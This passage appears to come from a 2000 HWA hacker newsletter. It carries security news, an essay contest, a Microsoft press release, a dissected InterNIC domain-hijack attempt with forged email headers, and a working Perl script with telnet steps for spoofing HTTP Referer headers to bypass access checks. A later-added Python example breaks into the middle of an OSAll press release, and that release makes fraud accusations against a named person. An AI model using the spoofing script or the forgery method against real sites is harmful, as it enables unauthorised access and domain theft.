I don't want to influence anybody. I just want people to read my column, read my feature stories for the magazine, and think for themselves. I'd rather raise a question than offer an answer. I'm passionate about my writing, am excited about the issues and the information and the personalities of the cyberage, and hope this comes across to the reader.

What is your current view on free-speech on the Internet? Do you feel harmful subject matter should be banned from being posted on websites?

I don't believe in censorship. If I did I might be its next victim.

What is your favorite hobby or pastime? Your favorite Web site?

Bike tripping. Few things better than packing up the bike--panniers, tent, sleeping bag, cook set--and taking off, camping off road. Fave Web site: None, or many. I jump around a lot. I spend a lot of time on Dow Jones Interactive, pulling up research.

Why did you agree to our invitation to interview you?

Because I spend my life trying to demystify technology, the least I could do was demystify myself.

@HWA

48.0 KISA Discovers Y2K Bug 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by cult hero

The Korea Information Security Agency (KISA) (who?) discovered a Y2K computer bug that was in the process of attacking 477 other systems. (Something must have gotten lost in the translation because first they call it a Y2K bug then they label it as a worm and a virus, which is it?)
Digital Chosun
http://www.chosun.com/w21data/html/news/199912/199912310137.html

Unix Millennium Bug Discovered

A spokesperson for Korea Information Security Agency (KISA) announced on Friday that it had discovered a millennium computer bug while investigating a hacking incident reported by a corporation. It also mentioned that the bug was in the process of attacking 477 computers when they found it. The program was similar to a worm virus, but while most worms attack internet linked computers using the "Windows" operating system, this one was programmed to automatically find weaknesses and attack computers utilizing "Unix." In 1998 a similar virus found in the States caused 7,500 government and public institution servers to crash within 24 hours.

(Lee Ji-hun, jhl@chosun.com)

@HWA

49.0 Sprint Says 'Area 51' Does Exist 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by bart

A standard service disruption report filed with the Federal Communications Commission by Sprint lists an outage on December 22, 1999 that includes "Las Vegas, NV - Pahrump, NV - Military Base 'AREA 51'". (Hmmm, I guess even places that don't exist need phone service.)

Federal Communications Commission - PDF file
http://www.fcc.gov/Bureaus/Engineering_Technology/Filings/Network_Outage/1999/reports/99-228.pdf

@HWA

50.0 Spoofing your HTTP referrer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.datatrendsoftware.com/spoof.html

How to Spoof HTTP_Referer (or any other browser passed variable)

To see an ELEMENTARY way to spoof any referer value, you'll need telnet, and a way to see the referer value that your server records (server logs always have the referer value in them).

Try the following: (if your homepage isn't index.html, replace it with home.htm or whatever)

    telnet www.yoursite.com 80 (press return)
    GET /index.html HTTP/1.0 (press return)
    Referer: http://www.hah-hah.com (press return)
    (press return again)

Now, check your server logs, and you'll see that "someone" from hah-hah.com grabbed your homepage.

If you are trying to "protect" a file by making sure that the referer value (or any other browser passed variable) is your own website, you can be bypassed by this simple technique.

Perl script to do the same deed:

#!/usr/bin/perl
#
# Web Spoof
# Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org]
#
# Summary:
#   Works as a normal command line web retrieval script,
#   except will spoof the referer. This can be left to the script to do,
#   or specified in the command line. This will bypass any kind of reference
#   checking, in most cases. Will also screw up the REMOTE_HOST variable which
#   some cgi scripts use, but the correct IP will of course be sent. Default
#   browser is Netscape 4.5 under Win95. This can be changed in the script.
#
# Usage:  - default output is standard out, to save to a file
#           you will need to redirect it, especially for
#           binary/image files -
#
#   ./webspf.pl [file]
#
# Examples:
#
#   ./webspf.pl language.perl.com/info/software.html > software.html
#      - referer would be language.perl.com/info/index.html -
#
#   ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif
#      - referer would be www.linux.org/images/logo/index.html -
#
#   ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html
#      - referer would be www.freebsd.org/whatever.html -
#
#

use IO::Socket;

$loc = $ARGV[0];                              # www.a.com/test.html
$temp = reverse($loc);                        # lmth.tset/moc.a.www
$host = substr($temp,rindex($temp,"\/")+1);   # moc.a.www
$host = reverse($host);                       # www.a.com
$dir = substr($loc,index($loc,"\/"));         # /test.html
$referer = $ARGV[1];                          #
if($referer eq "") {                          # true
  $temp = substr($temp,index($temp,"\/"));    # /moc.a.www
  $temp = reverse($temp);                     # www.a.com/
  $referer = $temp . "index\.html";           # www.a.com/index.html
}                                             # spoofed referer!

print STDERR "\nWebSpoof v1.0 : 12/18/1998\n";
print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n";

$res = 0;
$handle = IO::Socket::INET->new(Proto    => "tcp",
                                PeerAddr => $host,
                                PeerPort => 80) or $res = 1;

if($res eq 0) {
  $handle->autoflush(1);
  print STDERR "\[Connected to $host\]\n";
  print $handle "GET $dir HTTP/1.0\n";
  print $handle "Referer: $referer\n";
  print $handle "Connection: Close\n";
  print $handle "User-Agent: Mozilla\/4.5 [en] \(Win95\; I\)\n";
  print $handle "Host: $host\n";
  print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n";
  print $handle "Accept-Encoding: gzip\n";
  print $handle "Accept-Language: en\n";
  print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n";

  while($temp ne "") {                        # read some headers
    $temp = <$handle>;
    chop($temp);chop($temp);                  # strip the trailing CR LF
    @sort = split(/:/,$temp);
    if($sort[0] =~ /server/i) { print STDERR " \[$temp\]\n"; }
    if($sort[0] =~ /date/i) { print STDERR " \[$temp\]\n"; }
    if($sort[0] =~ /content/i) { print STDERR " \[$temp\]\n"; }
  }

  print STDERR "\[Receiving data\]\n";
  binmode(STDOUT);
  while(<$handle>) {                          # body goes to standard out
    print "$_";
  }
  close($handle);
  print STDERR "\[Connection Closed\]\n";
} else {
  print STDERR "\[Could not connect to $host\]\n";
}

@HWA

51.0 OSALL removed from the net. 01/13/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Press release: Owl Services 1/13/00

FOR IMMEDIATE RELEASE

OSAll (www.aviary-mag.com) is a leading computer security Web site, specializing in original news stories and methodology for computer security professionals. The magazine has been featured in the likes of US News & World Report, CNN, Fox News, PC World and many other media organizations.

On Friday January 8, 2000, OSAll (www.aviary-mag.com) was taken off of its Web server and all Internet connectivity was lost. Any attempts to contact aviary-mag.com for e-mail, FTP, http or other purposes will simply be rebuffed by the current host.
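Added example for item 50.0 (Spoofing your HTTP referrer) above; it is not part of the datatrendsoftware article, of the Perl script, or of the press release around it. It runs the Referer check that article warns about against a request any client can type, next to a server-signed expiring link that does not depend on client-supplied headers. `SECRET_KEY`, the `/members/report.pdf` path and all function names are assumptions made for the illustration.

```python
"""Referer gating versus a server-signed link (constructed example)."""
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "www.yoursite.com"        # placeholder host from the telnet walk-through
SECRET_KEY = b"constructed-demo-key"  # assumption: loaded from a secret store in practice

# Constructed request: any telnet or script client can type this header,
# claiming the user followed a link from the site's own homepage.
FORGED_REQUEST = (
    b"GET /members/report.pdf HTTP/1.0\r\n"
    b"Referer: http://www.yoursite.com/index.html\r\n"
    b"\r\n"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, target, lower-cased headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def referer_gate(headers):
    """Weak check: trust the client-supplied Referer to name our own site."""
    try:
        host = urlsplit(headers.get("referer", "")).hostname
    except ValueError:  # malformed URL in the header
        return False
    return host == SITE_HOST


def link_signature(path, expires):
    """HMAC-SHA256 over path and expiry, keyed with a server-only secret."""
    msg = "{}\n{}".format(path, expires).encode("utf-8")
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def sign_link(path, expires):
    """Issue a link the server can verify later without trusting any header."""
    return "{}?expires={}&sig={}".format(path, expires, link_signature(path, expires))


def signed_gate(target, now):
    """Allow only targets carrying an unexpired signature made with SECRET_KEY."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    try:
        expires = int(query["expires"][0])
        sig = query["sig"][0]
    except (KeyError, ValueError):
        return False  # token missing or not well-formed
    if now > expires:
        return False  # link has expired
    expected = link_signature(parts.path, expires)
    # Constant-time comparison of the presented and recomputed signatures.
    return hmac.compare_digest(sig.encode("utf-8"), expected.encode("utf-8"))


def decide(raw, now):
    """Return (referer_gate result, signed_gate result) for one raw request."""
    _method, target, headers = parse_request(raw)
    return referer_gate(headers), signed_gate(target, now)


if __name__ == "__main__":
    now = 946944000  # constructed clock value (2000-01-04 00:00:00 UTC)
    link = sign_link("/members/report.pdf", now + 300)
    honest = "GET {} HTTP/1.0\r\n\r\n".format(link).encode("ascii")
    print("forged Referer, no token:", decide(FORGED_REQUEST, now))
    print("signed link, no Referer :", decide(honest, now))
    print("signed link, expired    :", decide(honest, now + 301))
```

A signed link is a bearer token: whoever holds it can fetch the file until it expires, so issue it only to a session that has already been authenticated and keep the lifetime short.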
Reasons

The reason for this disconnection is not currently known, but rumors have begun to abound. This press release is intended to do several things - particularly attempt to settle those rumors.

JP Vrasenevich, Frank Jones, the US Government and others have all had reason to disconnect OSAll. Of these, the only one who has definitely tried to have OSAll disconnected is Mr. Vrasenevich, Webmaster and founder of AntiOnline. Vrasenevich has been complaining about OSAll to Communitech.net, the former host, for almost a year. Communitech.net added a Do Not Disconnect notice to the account, explaining that they would ignore Vrasenevich for the time being. Apparently these efforts have either been misplaced or Frank Jones has gotten to Communitech.net.

Frank Jones is President of Codex Data Systems, a fraud of a computer security company. They offer $500 a-head-lectures that explain that you need to use firewalls and claim to sell a product called "DIRT" to the Federal Government. Unfortunately, Frank Jones' probation for a conviction on defrauding the US Government prevents him from doing business with the FBI or any other federal agency. OSAll published an article regarding their lectures, and Frank Jones was hardly happy about it.

Is OSAll Returning?

Yes! NWO.net, the San Diego 2600 (sd2600.net), Radiusnet.net and several other sites have begun hosting mirrors of OSAll. NWO.net and the San Diego 2600 are exploring finding a permanent host for OSAll. In the mean time, you can find OSAll at NWO.net/osall and Radiusnet.net/~owl. Starting on Wednesday, OSAll will be updated according to its normal schedule.

-- Mike

@HWA

52.0 $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com/contest.html

Packet Storm: Storm Chaser 2000

The talk of distributed attack tools is causing quite a stir.
Obviously we are seeing just the tip of the iceberg with what is to come; attacks which involve factors such as encryption, mobility, stealth, that are under anonymous control, that update themselves, that use communication to co-ordinate, that are controlled by hacktivists, cyberterrorists, cybermilitia and, of course, governments. The Internet is truly becoming the fourth battlefield, built on top of not just a civilian, but an academic infrastructure.

How do we defend our part of the Internet against information warfare? Obviously there are more factors involved than just a technical solution; we need to consider issues of policy, international co-operation and co-ordination, and administration. But can we really wait for governments and politicians to solve this problem when technology increasingly outstrips policy?

With this in mind, Packet Storm poses this question:

What pure or applied technical measures can be taken to protect the Internet against future forms of attack?

The Kroll-O'Gara Information Security Group and Packet Storm will offer USD $10,000 for the best technical white paper which defines the problem and answers the above question. Competition Rules are outlined below. Winners will be announced at RSA 2000 in January.

Competition Rules

QUESTION

Kroll-O'Gara Information Security Group, Inc. ("Kroll-O'Gara ISG") and Packet Storm, a website sponsored by Kroll-O'Gara ISG (collectively, the "Sponsors") will offer USD $10,000 for the best technical white paper which defines the problem and answers the following question: "What pure or applied technical measures can be taken to protect the Internet against future forms of attack?"

ELIGIBILITY

The Competition may be entered by anyone worldwide. The judges of the Competition and all employees working with or associated with the Sponsors or their affiliated companies or the review panel are not qualified and may not participate in the competition. Multiple entries by an individual are acceptable.
Each entry must be original and have its own entry form. Multiple authors for a paper are allowed.

SUBMISSION FORMAT

Each entry shall consist of sufficient words to rigorously explore the entrant’s proposed solution(s) to the satisfaction of the review panel. All entries must be submitted in electronic form and include the author’s name, address, telephone number and E-mail address. ASCII text and PDF are the preferred formats for entry. Hand written or hard copy entries will not be accepted. All papers will be made public from the Packet Storm web site at http://packetstorm.securify.com after the winner is determined.

All entries must be sent electronically to: pss2000@packetstorm.securify.com

Sponsors reserve the right to modify the rules at any time. Current rules of the competition are available at: http://packetstorm.securify.com/contest.html

Entries may be encrypted using the pss2000 key, available on: ldap://certserver.pgp.com/.

Each entrant must complete an Affidavit of Eligibility and Liability and Publicity Release, except where prohibited by law. The completed Affidavit of Eligibility and Liability and Publicity Release must be attached to the end of the submission. Failure to include a completed Affidavit of Eligibility and Liability and Publicity Release as part of the submission will result in the disqualification of the submission. The form of the Affidavit of Eligibility and Liability and Publicity Release can be found at http://packetstorm.securify.com/contest.html.

REVIEW PANEL

The essays will be judged by a panel of security experts. The panel will include at least two employees of the Kroll-O'Gara ISG as well as at least 3 other individuals selected by Kroll-O'Gara ISG from leaders in industry, government, and academia.
JUDGEMENT CRITERIA:

Each eligible essay shall be judged on the basis of a 100 point scale using the following criteria:

  Creativity
  Design and architecture
  Scalability
  Technical merit
  For applied solutions, implementation feasibility
  For pure, or theoretical papers, originality and depth of analysis

DEADLINE

All entries must be received at pss2000@packetstorm.securify.com no later than midnight, PST on January 10, 2000 (as judged by our mail server, and no, you do not get an extension if the date on our mail server is hacked).

The winner of the Competition will be publicly announced at RSA2000, held January 16-20, 2000 in San Jose, CA. If the winner refuses in writing to accept the Competition prize, then the prize will be donated to the Electronic Freedom Foundation.

NOTIFICATION

The winner will be notified via e-mail and telephone.

COPYRIGHT AND PUBLICATION

The submission of an entry constitutes an assignment to Sponsors of all copyrights arising under both statute and the common law and all other rights derivative therefrom of the entry. By entering the Competition, entrants grant further permission for Sponsors to publish all or part of the submitted essay and to use entrant's name in connection therewith.

STATE, FEDERAL AND INTERNATIONAL REGULATIONS:

This Competition is subject to the provisions of all applicable International, Federal, State, and regulations. This offer is void where prohibited. Taxes, customs duties, fees, freight charges, and other related charges on prizes are the sole responsibility of the winner.

ADDITIONAL TERMS

The Competition is subject to all applicable state and federal laws, shall not conflict with any existing law and is void where prohibited. Sponsors are not responsible for lost, late, incomplete, illegible, or misdirected e-mail, for failed, partial or garbled computer transmissions, or for technical failures of any kind.
Sponsors reserve the right to cancel or modify the Competition for any reason and at their sole discretion. Sponsors' only obligations are to submit entries from eligible entrants to the review panel according to the procedures and criteria set forth in these Competition Rules and to award the prizes set forth herein, subject to the terms, conditions and contingencies delineated herein. By submitting an entry, entrant agrees that Sponsors' obligations are fair and adequate consideration for any entry submitted and that entrant is not entitled to and shall not seek any further compensation.

By participating in the Competition, entrant indemnifies Sponsors and their respective directors, officers, employees, agents and affiliates and waives all claim to intellectual property rights in the entry, including patent rights and copyrights, and waives all other publication rights, except where prohibited by law. To the extent that such waiver is ineffective or unenforceable, entrant hereby grants Sponsors an unlimited, unrestricted, perpetual, non-exclusive, transferable, royalty-free license to use, copy, modify, display, and sublicense the entry and any and all derivative works without geographical limitations or further compensation to entrant of any kind and entrant waives any and all rights to which entrant may be entitled, other than those set forth herein. Entrant agrees that e-mail shall satisfy any written requirement which may apply to intellectual property licenses. Upon request of Sponsors, entrant agrees to obtain written consent from the owner of the copyright in the application, if that person is not entrant, and to execute any documents required to effectuate the terms of these Competition Rules.
As a condition of entering this Competition, entrant agrees that: (1) any and all disputes, claims, and causes of action arising out of or connected with this Competition, or any prizes awarded, shall be resolved individually, without resort to any form of legal action, and exclusively by arbitration under the International Arbitration Rules of the American Arbitration Association in San Francisco, California; (2) no claim, judgment or award shall be made against entrant's costs incurred, including but not limited to legal costs, costs of labor, benefits, salaries or the value of time expended by entrant or others in any manner relating to, arising under, or resulting from entrant's participation in the competition; (3) under no circumstances will entrant claim punitive damages and entrant hereby waives all rights to claim punitive, incidental and consequential damages and any other special, implied or derivative damages.

The Competition Rules, or the rights and obligations of entrant and Sponsors in connection with the Competition, shall be governed by, and construed in accordance with, the laws of the State of California, U.S.A. All pertinent federal, state, and local laws and regulations apply.

Odds of winning are dependent upon the number and quality of entries received. Prizes must be accepted as awarded at the judges' discretion and are non-assignable and non-transferable. All judgements by the review panel are final. The Sponsors reserve the right to not issue an award should the review panel reach a consensus that none of the submitted entries reach a sufficient quality level.

For further information email: pss2000@packetstorm.securify.com.
@HWA

53.0 Bill Gates hands over CEO hat to Steve Ballmer
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.microsoft.com/presspass/press/2000/jan00/final25anv.htm

Bill Gates Promotes Steve Ballmer to President and CEO; Gates Creates New Role as Chairman and Chief Software Architect

Gates and Ballmer preview strategy to transform company around Internet User Experience and Next Generation Windows Services

REDMOND, Wash. -- Jan. 13, 2000 - Accelerating the company's major strategy initiative, Microsoft Corp. today announced that its co-founder, Bill Gates, has created a new role for himself -- Chairman and Chief Software Architect -- so that he can dedicate all of his time to helping drive the next generation Windows Internet platform and services. Microsoft announced that Steve Ballmer becomes president and CEO, and will take over management of the company.

These changes were announced following the release of Microsoft® Windows® 2000, which the company said is a crucial building block of its strategy to focus on software services -- a major technology shift that will transform the industry in the way the Graphical User Interface (GUI) and the Internet did. Driving this major shift is the need for a better Internet User Experience to enable businesses, consumers and developers to better personalize and tailor the services they use, and to store and share the information they need -- any time, any place and on any device.

At the core of this strategy are Microsoft's plans, announced today, to assemble the first Internet-based platform of Next Generation Windows Services (NGWS), which will power new products and services and incorporate such features and capabilities as a new user interface, natural language processing, application development approach, schema and new file system -- all of which have been in development.
As part of this platform, Microsoft said that a key set of NGWS will be hosted on the Internet and will be infused into future versions of Windows. The NGWS platform will create a host of new opportunities for other businesses, and is the foundation of the company's software services strategy, first articulated in September of last year at Microsoft's developer strategy day and described in further detail during Bill Gates' November 1999 Comdex speech.

"It is a great pleasure for me to announce that Steve Ballmer -- my long-term partner in building Microsoft and a great business leader -- is being named CEO," said Gates. "These are dramatic times in our industry. As we look ahead to what it will take to do an amazing job executing against our new strategic direction of building next-generation services for our customers, we recognize that we must refocus and reallocate our resources and talents against our key priorities and challenges."

"I'm returning to what I love most -- focusing on technologies for the future. This was a personal decision, one I have discussed with Steve and our board of directors for some time. Although I've been able to spend more time on our technical strategy since naming Steve as president in July 1998, I felt that the opportunities for Microsoft were incredible, yet our structure wasn't optimal to really take advantage of them to the degree that we should. Steve's promotion will allow me to dedicate myself full-time to my passion -- building great software and strategizing on the future, and nurturing and collaborating with the core team helping Steve run the company."

Gates also indicated that Ballmer would become a member of the Microsoft Corp. Board of Directors effective January 27.

"I am very excited and very honored," said Ballmer. "These are amazing times full of remarkable opportunities.
Microsoft has all of the right stuff -- great people and great technology -- to dramatically take action on a new strategy that builds on the company's heritage of applying software know-how to the new world of software services -- a world we will pioneer along with our partners.

"Software is the key to the future. It will drive and accelerate innovations in hardware, wireless, broadband, e-commerce and other fields. Our vision is to create a new services platform that will ignite new opportunities for literally thousands of partners and customers around the world," Ballmer said.

Setting Priorities: Microsoft Next Generation Windows Services (NGWS)

Ballmer today outlined his core priorities and announced plans for a major strategy day this Spring, when the company will outline details of the Internet User Experience vision and strategy. Ballmer said Bill Gates and Microsoft's four technical group vice presidents, including Paul Maritz, Jim Allchin, Bob Muglia, and Rick Belluzzo, will drive developing the technologies and user scenarios that are key to the success of the Internet User Experience and Next Generation Windows Services.

About Microsoft

Founded in 1975, Microsoft (Nasdaq "MSFT") is the worldwide leader in software for personal and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device.

For more information, media only: Rapid Response Team, Waggener Edstrom, (425) 450-5019, rrt@wagged.com

For more information, financial analysts only: Carla Lewis, senior director, Microsoft Investor Relations, (425) 936-3703

Note to editors: If you are interested in viewing additional information on Microsoft, please visit the Microsoft Web page at http://www.microsoft.com/presspass/ on Microsoft's corporate information pages.
@HWA

54.0 First Windows 2000 virus found
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Twstpair

http://www.maximumpc.com/content/2000/01/14/10598

First Windows 2000 Virus Discovered
Maximum PC

The first Windows 2000 specific virus was discovered earlier this week. It was sent to research labs by the virus's author, apparently, and spreads only on systems that have Windows 2000 installed.

The virus, which experts think is no big deal at this time because it doesn't exploit potential security holes, isn't in actual circulation yet. However, major antivirus software makers are already making claims that the virus will be detected by their software because of the way it works.

The virus, known as W2K.Installer.1676, only attempts to detect the operating system it is installed upon and upon confirmation of a Windows 2000 operating system just spreads. W2K.Installer.1676 is a relatively conventional file virus and doesn't have any significant damage-causing payload.

-=-

More Via HNN ; http://www2.infoworld.com/articles/en/xml/00/01/13/000113enfsecure.xml?Template=/storypages/printarticle.html

First Windows 2000 virus detected
By Terho Uimonen

Anti-virus software vendor F-Secure announced it has received a sample of the first virus written specifically to operate under Microsoft's forthcoming Windows 2000 operating system.

Known as Win2K.Inta, or Win2000.Install, F-Secure does not consider the virus to be a big threat since it has received no reports that the virus is "in the wild," meaning that it has not yet been discovered outside of controlled environments, said Mikko Hyppönen, manager of anti-virus research at the Finland-based company.

The virus operates only under Windows 2000 and is not designed to function at all under older versions of Windows. Microsoft is scheduled to start commercial shipments of the new operating system by mid-February.

"The interesting thing is that it already exists, not that it is a big threat," Hyppönen said. "It will probably not have much of a life span in the real world since ours, as well as other anti-virus software programs, already can handle it."

From now on, however, most new viruses are likely to include compatibility with Windows 2000, Hyppönen added. "Windows 2000 will be a widely-used operating system, and virus writers target the widest possible reach," he said.

F-Secure received a sample of the virus via an anonymous e-mail, as did several other leading anti-virus software vendors, Hyppönen said. The virus was probably written by an international group of virus writers known as the 29A virus group, he said. "It is the first Windows 2000 virus, so I think they are mainly after the media attention -- they want their five minutes of fame."

Win2K.Inta works by infecting program files and spreads from one computer to another when these files are exchanged. Once infected, the files do not grow in size, according to F-Secure, and the virus is capable of infecting files with the following extensions: EXE, COM, DLL, ACM, AX, CNV, CPL, DRV, MPD, OCX, PCI, SCR, SYS, TSP, TLB, VWP, WPC, and MSI.

This list includes several classes of programs that to date have not been susceptible to virus infection, F-Secure said. For example, this virus will analyze Microsoft Windows Installer files (MSI), scan them for embedded programs, and infect them, the company said in a statement.

The virus contains this text string, which is never displayed: (Win2000.Installer) by Benny/29A & Darkman/29A, according to F-Secure.

Further information about the virus can be found at www.F-Secure.com/virus-info/v-pics .

Formerly known as Data Fellows Corp., the Finnish software company was founded in 1988 and late last year changed its name to F-Secure Corp. Its North American headquarters are in San Jose, Calif.

F-Secure Corp., in Espoo, Finland, is at www.f-secure.com .

Terho Uimonen is a Scandinavian correspondent for the IDG News Service, an InfoWorld affiliate.
@HWA

55.0 InterNIC domain name hijacking: "It happens"
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Your site may be open to attack via indirect means. Is your InterNIC record secure? Did you at least set a password when you registered your domain with Network Solutions? Your domain name could be seized by a wily hacker and redirected to anywhere on the net, effectively hijacking your site's focus. Here is an account of such an attack attempt...

Minimal background Info:

Leading email:

~ :A hax0r (mnemonic of keyr00t) tried this with me and Nokia (*shrug*). I
~ :wrote a brief account of what happened.
~ :
~ :  Internic Domain Hijacking - "It Happens"
~ :  http://dev.whitehats.com/papers/internic/index.html
~ :
~ :Of course, I have still heard *nothing* from Internic, AOL, or any parties
~ :involved in the attempted hijacking.
~ :

A friend of mine had several of his domains stolen the same way, when some freak got access to his mailbox. It took me a week (including messing around that dude boxen) to get all the stuff back. Otherwise it could take months to go into legal trial to return the domain. Network Solutions really should have a better clue while dealing with such stuff.

-=-

KRS: Key R00t Systems
IRC: EFnet channel #!krs
Founder: Mnemonic (* AOL user)
Website(s): http://s-club.4mg.com/ (Now inactive)

-=-

Details of attack: http://dev.whitehats.com/papers/internic/index.html

Internic Domain Hijacking - "It Happens"
Max Vision, http://www.maxvision.net/

OVERVIEW

This morning I witnessed an attempted takeover of one of my domains, MAXVISION.NET. The attacker, calling themself "Mnemonic of the group KeyRoot", using an AOL.COM address, attempted to spoof a request from me to change the primary and secondary DNS servers for my domain, to Network Solutions / Internic. If successful, this request would effectively give them control of maxvision.net until I could have sorted it out with Internic. Their attempt was foiled for several reasons, which I will outline below.
THE ATTACK

The attacker sent a forged Domain Modification form to Internic. There were several incompetent errors in the submission that caused the submission to fail. Had these errors not been made, and had I relied on the MAIL-FROM mechanism of Internic, then control of my domain would have been effectively hijacked.

Overview of forged email path:

The first sign that something was going on was an email from Internic, confirming "my request".

Email confirmation "response" from Internic

Date: Sun, 2 Jan 2000 17:19:50 -0500 (EST)
From: hostmaster@internic.net
To: Max Vision
Subject: Re: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net

This is an automatic reply from Network Solutions to acknowledge that your message has been received. This acknowledgement is NOT a confirmation that your request has been processed.

If you need to correspond with us regarding this request, please be sure to reference the tracking number [[NIC-000102.b318]] in the subject of your message.

Regards,
InterNIC Registration Services

... other standard Internic advertising followed (omitted)

Moments later I received an error message from Internic (the attacker had made a mistake), which provided me with the evidence I needed to track the offender.

Email error "response" from Internic

Date: Sun, 2 Jan 2000 17:20:29 -0500 (EST)
From: Domain Registration Role Account
Reply-To: hostmaster@internic.net
To: vision@HUNGRY.COM
Subject: Re: [NIC-000102.b318] MAXVISION.NET

The Domain Name Registration Agreement below has been returned to you due to the following errors. Please review the Domain Name Registration Agreement instructions available at ftp://www.networksolutions.com/templates/domain-template.txt.
The glossary of the parser errors is available at ftp://www.networksolutions.com/templates/domain-parser-errors.txt

Network Solutions Registration Services
email hostmaster@networksolutions.com

dreg08

The attacker had tried to use the same DNS server as primary and secondary

=========================================================================
ERROR: duplicate item 8 /<209.210.67.126>
Either the hostname or the IP address of a name server matches that of another server in the server list.
=========================================================================

The From header was spoofed, the upper case indicates it was copied from my whois record

>From vision@HUNGRY.COM Sun Jan 2 17:17:06 2000
>Received: from rs.internic.net (bipmx2.lb.internic.net [192.168.120.15])
>        by opsmail.internic.net (8.9.3/8.9.1) with SMTP id RAA28490
>        for ; Sun, 2 Jan 2000 17:17:05 -0500 (EST)
>Received: (qmail 6410 invoked from network); 2 Jan 2000 22:17:05 -0000

This mail server was used to bounce the message. LAME! See my mailrelay writeup. Note that the attacker used smtp9.gateway.net which seems to forward through an internal "gateway.net" server, thus the 192.168 non-routable address.

>Received: from relaye.gateway.net (HELO smtp9.gateway.net) (208.230.117.253)
>        by 192.168.119.15 with SMTP; 2 Jan 2000 22:17:05 -0000

This indicates the attacker sent "HELO HUNGRY.COM" in their email forgery session; however, their true IP is shown as 152.201.160.206

>Received: from HUNGRY.COM (98C9A0CE.ipt.aol.com [152.201.160.206])
>        by smtp9.gateway.net (8.9.3/8.9.3) with ESMTP id RAA13460
>        for ; Sun, 2 Jan 2000 17:17:03 -0500 (EST)
>Message-ID: <386FCEFC.9D64F794@HUNGRY.COM>
>Date: Sun, 02 Jan 2000 17:19:40 -0500
>From: Max Vision
>Organization: Max Vision

They set this as part of their use of gateway.net to forge the email

>X-Sender: "Max Vision" (Unverified)

If they didn't forge this header, it looks like an outdated Netscape on win98

>X-Mailer: Mozilla 4.06 [en]C-gatewaynet (Win98; I)
>MIME-Version: 1.0
>To: hostmaster@networksolutions.com
>Subject: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>X-MTS-Ticket: 000102.b318
>X-MTS-Type: Domain
>X-MTS-Mode: Modify
>X-MTS-Priority: Normal
>X-MTS-Status: Open
>X-MTS-Timestamp: 000102171706
>
>
>----------------------------------------------------
>This is the Domain Name Registration Agreement you
>recently created.
>In order to complete this modification,
>
>YOU MUST E-MAIL THIS FORM TO: hostmaster@networksolutions.com
>
>After you e-mail this form, you should receive an auto-reply
>with a tracking number. You must use that number in the
>Subject of any future messages you send regarding
>this registration action.
>Once this registration action is completed you will receive
>a notification via e-mail.
>
>**** PLEASE DO NOT REMOVE Version Number or any of the information below
>when submitting this template to hostmaster@networksolutions.com. *****
>
>Domain Version Number: 5.0
>
>********* Email completed agreement to hostmaster@networksolutions.com
>*********
>
>
>AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s)
>through our online application process or by applying for and registering a
>domain name as part of our e-mail template application process or by using
>the service(s) provided by Network Solutions under the Service Agreement,
>Version 5.0, you acknowledge that you have read and agree to be bound by all
>terms and conditions of this Agreement and any pertinent rules or policies
>that are or may be published by Network Solutions.
>
>Please find the Network Solutions Service Agreement, Version 5.0 located
>at
>the URL http://www.networksolutions.com/legal/service-agreement.html.
>
>
>[URL ftp://www.networksolutions.com]
>[11/99]
>
>Authorization

The attacker used the wrong text here, ignorant switching of "Name" for "New"

>0a. (N)ew (M)odify (D)elete.........: M Name Registration
>0b. Auth Scheme.....................: MAIL-FROM
>0c. Auth Info.......................:
>
>1. Comments........................:
>
>2. Complete Domain Name............: maxvision.net
>
>Organization Using Domain Name

Here they retained my old contact info

>3a. Organization Name................: Max Vision
>3b. Street Address..................: 65 Washington Ave Suite 180
>3c. City............................: Santa Clara
>3d. State...........................: CA
>3e. Postal Code.....................: 95050
>3f. Country.........................: US
>
>Administrative Contact

and here they tried to make "themself" the admin contact

>4a. NIC Handle (if known)...........:
>4b. (I)ndividual (R)ole?............: Individual
>4c. Name (Last, First)..............: Stakl, Joe
>4d. Organization Name...............: Max Vision

there is no Gate street in this city, AFAIK

>4e. Street Address..................: 1458 Gate St.
>4f. City............................: Saint Mary
>4g. State...........................: MD
>4h. Postal Code.....................: 20618
>4i. Country.........................: USA

This number is invalid

>4j. Phone Number....................: 401-597-0588
>4k. Fax Number......................:
>4l. E-Mailbox.......................: vision@HUNGRY.COM
>
>Technical Contact

Same problems as Admin contact info above

>5a. NIC Handle (if known)...........:
>5b. (I)ndividual (R)ole?............: Individual
>5c. Name(Last, First)...............: Stakl, Joe
>5d. Organization Name...............: Max Vision
